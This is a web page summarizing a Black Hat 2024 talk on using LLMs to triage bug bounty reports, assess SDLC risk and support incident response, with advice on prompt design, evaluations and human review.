Black Hat2024

LLMs at the Core: From Attention to Action in Scaling Security Teams

Black Hat1,061 views43:02over 1 year ago

This talk demonstrates the integration of Large Language Models (LLMs) into security operations to automate SDLC risk assessment, incident response, and bug bounty report triage. The speakers showcase how LLMs can be used to analyze Slack conversations, design documents, and security logs to provide actionable insights and reduce human workload. The presentation highlights the importance of using high-quality data, prompt engineering, and human-in-the-loop verification to mitigate LLM hallucinations and errors. The authors also release three open-source tools designed to implement these automated security workflows.

Automating Security Triage: Scaling Your Workflow with LLMs

TLDR: Security teams are drowning in noise from bug bounty programs and internal alerts, leading to burnout and missed critical vulnerabilities. This talk introduces three open-source bots that leverage LLMs to automate SDLC risk assessment, triage incoming bug reports, and handle incident response. By integrating these tools into Slack and using high-quality prompt engineering, teams can filter out the noise and focus human effort on genuine threats.

Security operations centers and internal security teams are currently facing a massive scaling problem. Between the sheer volume of automated scanner output and the flood of reports from public bug bounty programs, the signal-to-noise ratio has plummeted. When a team receives 900 reports in a single week, the human cost of manual triage becomes unsustainable. Most of these reports are either out of scope, duplicates, or simple misconfigurations that don't warrant a high-priority investigation. This is where the industry is shifting toward using LLMs not as a replacement for human judgment, but as a force multiplier for the triage process.

Moving Beyond Simple Automation

Traditional security tools rely on static rules and regex-based filtering, which are notoriously brittle. If a developer changes a document format or a bug bounty hunter uses a slightly different phrasing, the automated pipeline breaks. The research presented at Black Hat 2024 demonstrates a more flexible approach: using LLMs to interpret context. By feeding raw data from Slack threads, design documents, and security logs into a model, you can perform semantic analysis that understands the intent behind a message or a configuration change.

The core of this approach is the SDLC bot, which acts as an automated gatekeeper for new projects. Instead of forcing developers to fill out complex security questionnaires, the bot monitors design documents and Slack discussions. It extracts the necessary context to assign a risk rating and a confidence score. If the bot identifies a high-risk change, such as a shift from internal-only access to public exposure, it flags the project for a manual security review. This keeps the security team involved only when it matters, rather than acting as a bottleneck for every minor feature update.

The Mechanics of LLM-Driven Triage

One of the most effective use cases for this technology is triaging bug bounty reports. The volume of reports can be overwhelming, and many are submitted by researchers who lack the full context of your internal architecture. The Incident Response Bot helps by automatically categorizing incoming reports into buckets like "Model Safety," "Customer Support," or "Security Report."

For a pentester or researcher, the value here is in the feedback loop. If a report is missing a full URL or clear reproduction steps, the bot can automatically prompt the researcher for the missing information. This reduces the back-and-forth time for the triager. The model is essentially acting as a first-pass analyst, ensuring that by the time a human looks at a report, it is complete and actionable.

To implement this effectively, you must move away from "vibe-based" prompting. The speakers emphasized that you need to treat the model like an expert. When you prompt the model, explicitly define its role: "You are an expert cybersecurity engineer." This simple instruction significantly improves the quality of the output. Furthermore, you should use Evals to measure performance. If you are not testing your prompts against a known dataset of good and bad reports, you are flying blind.

Real-World Applicability and Risks

During the live demo, the speakers showed how the bot could detect a malicious reverse shell command hidden within a user's bash history. The model identified the command, flagged it as a security incident, and initiated a chat with the user to confirm their intent. This is a powerful example of how LLMs can handle the "boring" parts of log analysis, allowing SOC analysts to focus on complex, multi-stage attacks.

However, these tools are not infallible. The biggest risk is over-reliance on the model's output. You must maintain a human-in-the-loop for any decision that involves access control or incident escalation. If the model incorrectly classifies a critical Broken Access Control issue as "out of scope," you have a major problem. The goal is to use the model to filter the 90% of noise, not to automate the final decision on the 10% of critical findings.

Building Your Own Pipeline

If you want to start experimenting with these techniques, you don't need to build a custom model from scratch. The tools released by the team are designed to work with off-the-shelf models. Start by identifying the most repetitive, low-value tasks in your current workflow. If you spend hours every week closing "not applicable" reports or manually checking if a new service is exposed to the internet, that is your starting point.

Focus on high-quality data. If your internal documentation is outdated or your Slack channels are filled with irrelevant chatter, the model will struggle. Clean up your input data before you try to automate the analysis. When you do start, use the evaluation framework to track your progress. If you see the model's accuracy dip after a change to your prompt, you will know exactly when and why it happened. Security automation is not a set-and-forget process; it is an iterative cycle of testing, refining, and monitoring. Start small, keep the human in the loop, and let the model handle the heavy lifting of the initial triage.

Talk Type

talk

Difficulty

intermediate